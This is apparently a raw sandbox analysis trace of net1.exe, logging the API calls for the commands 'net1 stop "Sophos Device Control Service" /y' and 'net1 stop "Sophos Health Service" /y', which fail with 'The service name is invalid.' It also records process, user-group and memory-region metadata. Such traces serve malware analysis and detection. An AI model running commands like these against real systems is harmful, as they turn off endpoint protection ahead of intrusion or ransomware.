QueryPerformanceCounter (in: lpPerformanceCount=0xcfa98 | out: lpPerformanceCount=0xcfa98*=1813016800000) returned 1 [0083.252] GetModuleHandleW (lpModuleName=0x0) returned 0xffc40000 [0083.252] __set_app_type (_Type=0x1) [0083.252] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc59c9c) returned 0x0 [0083.252] __getmainargs (in: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788, _DoWildCard=0, _StartInfo=0xffc6479c | out: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788) returned 0 [0083.252] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.252] GetConsoleOutputCP () returned 0x1b5 [0083.253] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffc6cec0 | out: lpCPInfo=0xffc6cec0) returned 1 [0083.253] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0083.255] sprintf_s (in: _DstBuf=0xcfa38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0083.255] setlocale (category=0, locale=".437") returned="English_United States.437" [0083.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0083.257] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0083.257] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Device Control Service\" /y" [0083.257] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf7d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0083.257] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0083.257] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfa28 | out: Buffer=0xcfa28*=0xec100) returned 0x0 [0083.257] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfa28 | out: Buffer=0xcfa28*=0xec120) returned 0x0 [0083.257] _fileno (_File=0x7fefdba2a80) returned 0 [0083.257] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0083.258] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0083.258] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0083.258] _wcsicmp (_String1="config", _String2="stop") returned -16 [0083.258] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0083.258] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0083.258] _wcsicmp (_String1="file", _String2="stop") returned -13 [0083.258] _wcsicmp (_String1="files", _String2="stop") returned -13 [0083.258] _wcsicmp (_String1="group", _String2="stop") returned -12 [0083.258] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0083.258] _wcsicmp (_String1="help", _String2="stop") returned -11 [0083.258] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0083.258] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0083.258] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0083.258] _wcsicmp (_String1="session", _String2="stop") returned -15 [0083.258] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0083.258] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0083.258] _wcsicmp (_String1="share", _String2="stop") returned -12 [0083.258] _wcsicmp (_String1="start", _String2="stop") returned -14 [0083.258] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0083.258] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0083.258] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0083.258] _wcsicmp (_String1="accounts", _String2="Sophos Device Control Service") returned -18 [0083.258] _wcsicmp (_String1="computer", _String2="Sophos Device Control Service") returned -16 [0083.258] _wcsicmp (_String1="config", _String2="Sophos Device Control Service") returned -16 [0083.258] _wcsicmp (_String1="continue", _String2="Sophos Device Control Service") returned -16 [0083.258] _wcsicmp (_String1="cont", _String2="Sophos Device Control Service") returned -16 [0083.258] _wcsicmp (_String1="file", _String2="Sophos Device Control Service") returned -13 [0083.258] _wcsicmp (_String1="files", _String2="Sophos Device Control Service") returned -13 [0083.258] _wcsicmp (_String1="group", _String2="Sophos Device Control Service") returned -12 [0083.259] _wcsicmp (_String1="groups", _String2="Sophos Device Control Service") returned -12 [0083.259] _wcsicmp (_String1="help", _String2="Sophos Device Control Service") returned -11 [0083.259] _wcsicmp (_String1="helpmsg", _String2="Sophos Device Control Service") returned -11 [0083.259] _wcsicmp (_String1="localgroup", _String2="Sophos Device Control Service") returned -7 [0083.259] _wcsicmp (_String1="pause", _String2="Sophos Device Control Service") returned -3 [0083.259] _wcsicmp (_String1="session", _String2="Sophos Device Control Service") returned -10 [0083.259] _wcsicmp (_String1="sessions", _String2="Sophos Device Control Service") returned -10 [0083.259] _wcsicmp (_String1="sess", _String2="Sophos Device Control Service") returned -10 [0083.259] _wcsicmp (_String1="share", _String2="Sophos Device Control Service") returned -7 [0083.259] _wcsicmp (_String1="start", _String2="Sophos Device Control Service") returned 5 [0083.259] _wcsicmp (_String1="stats", _String2="Sophos Device Control Service") returned 5 [0083.259] _wcsicmp (_String1="statistics", _String2="Sophos Device Control Service") returned 5 [0083.259] _wcsicmp (_String1="stop", _String2="Sophos Device Control Service") returned 5 [0083.259] _wcsicmp (_String1="time", _String2="Sophos Device Control Service") returned 1 [0083.259] _wcsicmp (_String1="user", _String2="Sophos Device Control Service") returned 2 [0083.259] _wcsicmp (_String1="users", _String2="Sophos Device Control Service") returned 2 [0083.259] _wcsicmp (_String1="msg", _String2="Sophos Device Control Service") returned -6 [0083.259] _wcsicmp (_String1="messenger", _String2="Sophos Device Control Service") returned -6 [0083.259] _wcsicmp (_String1="receiver", _String2="Sophos Device Control Service") returned -1 [0083.259] _wcsicmp (_String1="rcv", _String2="Sophos Device Control Service") returned -1 [0083.259] _wcsicmp (_String1="netpopup", _String2="Sophos Device Control Service") returned -5 [0083.259] _wcsicmp (_String1="redirector", _String2="Sophos Device Control Service") returned -1 [0083.259] _wcsicmp (_String1="redir", _String2="Sophos Device Control Service") returned -1 [0083.259] _wcsicmp (_String1="rdr", _String2="Sophos Device Control Service") returned -1 [0083.259] _wcsicmp (_String1="workstation", _String2="Sophos Device Control Service") returned 4 [0083.259] _wcsicmp (_String1="work", _String2="Sophos Device Control Service") returned 4 [0083.259] _wcsicmp (_String1="wksta", _String2="Sophos Device Control Service") returned 4 [0083.259] _wcsicmp (_String1="prdr", _String2="Sophos Device Control Service") returned -3 [0083.259] _wcsicmp (_String1="devrdr", _String2="Sophos Device Control Service") returned -15 [0083.259] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos Device Control Service") returned -7 [0083.259] _wcsicmp (_String1="server", _String2="Sophos Device Control Service") returned -10 [0083.259] _wcsicmp (_String1="svr", _String2="Sophos Device Control Service") returned 7 [0083.260] _wcsicmp (_String1="srv", _String2="Sophos Device Control Service") returned 3 [0083.260] _wcsicmp (_String1="lanmanserver", _String2="Sophos Device Control Service") returned -7 [0083.260] _wcsicmp (_String1="alerter", _String2="Sophos Device Control Service") returned -18 [0083.260] _wcsicmp (_String1="netlogon", _String2="Sophos Device Control Service") returned -5 [0083.260] _wcsupr (in: _String="Sophos Device Control Service" | out: _String="SOPHOS DEVICE CONTROL SERVICE") returned="SOPHOS DEVICE CONTROL SERVICE" [0083.260] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xece30 [0083.264] GetServiceKeyNameW (in: hSCManager=0xece30, lpDisplayName="SOPHOS DEVICE CONTROL SERVICE", lpServiceName=0xffc65750, lpcchBuffer=0xcf948 | out: lpServiceName="", lpcchBuffer=0xcf948) returned 0 [0083.265] _wcsicmp (_String1="msg", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -6 [0083.265] _wcsicmp (_String1="messenger", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -6 [0083.265] _wcsicmp (_String1="receiver", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -1 [0083.266] _wcsicmp (_String1="rcv", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -1 [0083.266] _wcsicmp (_String1="redirector", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -1 [0083.266] _wcsicmp (_String1="redir", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -1 [0083.266] _wcsicmp (_String1="rdr", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -1 [0083.266] _wcsicmp (_String1="workstation", _String2="SOPHOS DEVICE CONTROL SERVICE") returned 4 [0083.266] _wcsicmp (_String1="work", _String2="SOPHOS DEVICE CONTROL SERVICE") returned 4 [0083.266] _wcsicmp (_String1="wksta", _String2="SOPHOS DEVICE CONTROL SERVICE") returned 4 [0083.266] _wcsicmp (_String1="prdr", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -3 [0083.266] _wcsicmp (_String1="devrdr", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -15 [0083.266] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -7 [0083.266] _wcsicmp (_String1="server", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -10 [0083.266] _wcsicmp (_String1="svr", _String2="SOPHOS DEVICE CONTROL SERVICE") returned 7 [0083.266] _wcsicmp (_String1="srv", _String2="SOPHOS DEVICE CONTROL SERVICE") returned 3 [0083.266] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -7 [0083.266] _wcsicmp (_String1="alerter", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -18 [0083.266] _wcsicmp (_String1="netlogon", _String2="SOPHOS DEVICE CONTROL SERVICE") returned -5 [0083.266] NetServiceControl (in: servername=0x0, service="SOPHOS DEVICE CONTROL SERVICE", opcode=0x0, arg=0x0, bufptr=0xcf950 | out: bufptr=0xcf950) returned 0x889 [0083.267] wcscpy_s (in: _Destination=0xffc680d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0083.267] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0083.268] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0083.270] GetFileType (hFile=0xb) returned 0x2 [0083.270] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf818 | out: lpMode=0xcf818) returned 1 [0083.270] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf810, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0xcf810*=0x1e) returned 1 [0083.271] GetFileType (hFile=0xb) returned 0x2 [0083.271] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf818 | out: lpMode=0xcf818) returned 1 [0083.271] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf810, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0xcf810*=0x2) returned 1 [0083.271] _ultow (in: _Dest=0x889, _Radix=850048 | out: _Dest=0x889) returned="2185" [0083.272] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffc65b50, nSize=0x800, Arguments=0xffc67f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0083.272] GetFileType (hFile=0xb) returned 0x2 [0083.272] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf818 | out: lpMode=0xcf818) returned 1 [0083.272] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc65b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf810, lpReserved=0x0 | out: lpBuffer=0xffc65b50*, lpNumberOfCharsWritten=0xcf810*=0x34) returned 1 [0083.273] GetFileType (hFile=0xb) returned 0x2 [0083.273] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf818 | out: lpMode=0xcf818) returned 1 [0083.273] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffc41efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf810, lpReserved=0x0 | out: lpBuffer=0xffc41efc*, lpNumberOfCharsWritten=0xcf810*=0x2) returned 1 [0083.274] NetApiBufferFree (Buffer=0xec100) returned 0x0 [0083.274] NetApiBufferFree (Buffer=0xec120) returned 0x0 [0083.274] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Device Control Service\" /y" [0083.274] exit (_Code=2) Process: id = "67" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x1add9000" os_pid = "0xf94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "60" os_parent_pid = "0xde4" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos Health Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4118 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4119 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4120 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4121 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4122 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4123 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4124 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4125 start_va = 0xffc40000 end_va = 0xffc72fff entry_point = 0xffc40000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4126 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4127 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4128 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 4129 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4184 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 4185 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4186 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4187 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4188 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4189 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4190 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4191 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 4192 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4193 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4194 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4195 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4196 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4197 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4198 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4199 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4200 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4201 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4202 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4203 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4204 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4205 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4206 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4207 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4208 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4209 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4276 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 407 os_tid = 0xf9c [0083.402] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f950 | out: lpSystemTimeAsFileTime=0x18f950*(dwLowDateTime=0xe6e1fab0, dwHighDateTime=0x1d48689)) [0083.403] GetCurrentProcessId () returned 0xf94 [0083.403] GetCurrentThreadId () returned 0xf9c [0083.403] GetTickCount () returned 0x1ebb5 [0083.403] QueryPerformanceCounter (in: lpPerformanceCount=0x18f958 | out: lpPerformanceCount=0x18f958*=1813032100000) returned 1 [0083.404] GetModuleHandleW (lpModuleName=0x0) returned 0xffc40000 [0083.404] __set_app_type (_Type=0x1) [0083.404] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc59c9c) returned 0x0 [0083.405] __getmainargs (in: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788, _DoWildCard=0, _StartInfo=0xffc6479c | out: _Argc=0xffc64780, _Argv=0xffc64790, _Env=0xffc64788) returned 0 [0083.405] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.405] GetConsoleOutputCP () returned 0x1b5 [0083.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffc6cec0 | out: lpCPInfo=0xffc6cec0) returned 1 [0083.489] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0083.491] sprintf_s (in: _DstBuf=0x18f8f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0083.491] setlocale (category=0, locale=".437") returned="English_United States.437" [0083.493] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0083.493] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0083.493] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Health Service\" /y" [0083.494] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f690, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0083.494] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0083.494] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f8e8 | out: Buffer=0x18f8e8*=0x24c0f0) returned 0x0 [0083.494] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18f8e8 | out: Buffer=0x18f8e8*=0x24c110) returned 0x0 [0083.494] _fileno (_File=0x7fefdba2a80) returned 0 [0083.494] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0083.494] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0083.494] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0083.494] _wcsicmp (_String1="config", _String2="stop") returned -16 [0083.494] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0083.494] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0083.494] _wcsicmp (_String1="file", _String2="stop") returned -13 [0083.494] _wcsicmp (_String1="files", _String2="stop") returned -13 [0083.494] _wcsicmp (_String1="group", _String2="stop") returned -12 [0083.494] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0083.495] _wcsicmp (_String1="help", _String2="stop") returned -11 [0083.495] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0083.495] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0083.495] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0083.495] _wcsicmp (_String1="session", _String2="stop") returned -15 [0083.495] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0083.495] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0083.495] _wcsicmp (_String1="share", _String2="stop") returned -12 [0083.495] _wcsicmp (_String1="start", _String2="stop") returned -14 [0083.495] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0083.495] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0083.495] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0083.495] _wcsicmp (_String1="accounts", _String2="Sophos Health Service") returned -18 [0083.495] _wcsicmp (_String1="computer", _String2="Sophos Health Service") returned -16 [0083.495] _wcsicmp (_String1="config", _String2="Sophos Health Service") returned -16 [0083.495] _wcsicmp (_String1="continue", _String2="Sophos Health Service") returned -16 [0083.495] _wcsicmp (_String1="cont", _String2="Sophos Health Service") returned -16 [0083.495] _wcsicmp (_String1="file", _String2="Sophos Health Service") returned -13 [0083.495] _wcsicmp (_String1="files", _String2="Sophos Health Service") returned -13 [0083.495] _wcsicmp (_String1="group", _String2="Sophos Health Service") returned -12 [0083.495] _wcsicmp (_String1="groups", _String2="Sophos Health Service") returned -12 [0083.495] _wcsicmp (_String1="help", _String2="Sophos Health Service") returned -11 [0083.495] _wcsicmp (_String1="helpmsg", _String2="Sophos Health Service") returned -11 [0083.495] _wcsicmp (_String1="localgroup", _String2="Sophos Health Service") returned -7 [0083.495] _wcsicmp (_String1="pause", _String2="Sophos Health Service") returned -3 [0083.495] _wcsicmp (_String1="session", _String2="Sophos Health Service") returned -10 [0083.495] _wcsicmp (_String1="sessions", _String2="Sophos Health Service") returned -10 [0083.495] _wcsicmp (_String1="sess", _String2="Sophos Health Service") returned -10 [0083.495] _wcsicmp (_String1="share", _String2="Sophos Health Service") returned -7 [0083.496] _wcsicmp (_String1="start", _String2="Sophos Health Service") returned 5 [0083.496] _wcsicmp (_String1="stats", _String2="Sophos Health Service") returned 5 [0083.496] _wcsicmp (_String1="statistics", _String2="Sophos Health Service") returned 5 [0083.496] _wcsicmp (_String1="stop", _String2="Sophos Health Service") returned 5 [0083.496] _wcsicmp (_String1="time", _String2="Sophos Health Service") returned 1 [0083.496] _wcsicmp (_String1="user", _String2="Sophos Health Service") returned 2 [0083.496] _wcsicmp (_String1="users", _String2="Sophos Health Service") returned 2 [0083.496] _wcsicmp (_String1="msg", _String2="Sophos Health Service") returned -6 [0083.496] _wcsicmp (_String1="messenger", _String2="Sophos Health Service") returned -6 [0083.496] _wcsicmp (_String1="receiver", _String2="Sophos Health Service") returned -1 [0083.496] _wcsicmp (_String1="rcv", _String2="Sophos Health Service") returned -1 [0083.496] _wcsicmp (_String1="netpopup", _String2="Sophos Health Service") returned -5 [0083.496] _wcsicmp (_String1="redirector", _String2="Sophos Health Service") returned -1 [0083.496] _wcsicmp (_String1="redir", _String2="Sophos Health Service") returned -1 [0083.496] _wcsicmp (_String1="rdr", _String2="Sophos Health Service") returned -1 [0083.496] _wcsicmp (_String1="workstation", _String2="Sophos Health Service") returned 4 [0083.496] _wcsicmp (_String1="work", _String2="Sophos Health Service") returned 4 [0083.496] _wcsicmp (_String1="wksta", _String2="Sophos Health Service") returned 4 [0083.496] _wcsicmp (_String1="prdr", _String2="Sophos Health Service") returned -3 [0083.496] _wcsicmp (_String1="devrdr", _String2="Sophos Health Service") returned -15 [0083.496] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos Health Service") returned -7 [0083.496] _wcsicmp (_String1="server", _String2="Sophos Health Service") returned -10 [0083.496] _wcsicmp (_String1="svr", _String2="Sophos Health Service") returned 7 [0083.496] _wcsicmp (_String1="srv", _String2="Sophos Health Service") returned 3 [0083.496] _wcsicmp (_String1="lanmanserver", _String2="Sophos Health Service") returned -7 [0083.496] _wcsicmp (_String1="alerter", _String2="Sophos Health Service") returned -18 [0083.496] _wcsicmp (_String1="netlogon", _String2="Sophos Health Service") returned -5 [0083.497] _wcsupr (in: _String="Sophos Health Service" | out: _String="SOPHOS HEALTH SERVICE") returned="SOPHOS HEALTH SERVICE" [0083.497] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x24ce20 [0083.501] GetServiceKeyNameW (in: hSCManager=0x24ce20, lpDisplayName="SOPHOS HEALTH SERVICE", lpServiceName=0xffc65750, lpcchBuffer=0x18f808 | out: lpServiceName="", lpcchBuffer=0x18f808) returned 0 [0083.502] _wcsicmp (_String1="msg", _String2="SOPHOS HEALTH SERVICE") returned -6 [0083.502] _wcsicmp (_String1="messenger", _String2="SOPHOS HEALTH SERVICE") returned -6 [0083.502] _wcsicmp (_String1="receiver", _String2="SOPHOS HEALTH SERVICE") returned -1 [0083.502] _wcsicmp (_String1="rcv", _String2="SOPHOS HEALTH SERVICE") returned -1 [0083.502] _wcsicmp (_String1="redirector", _String2="SOPHOS 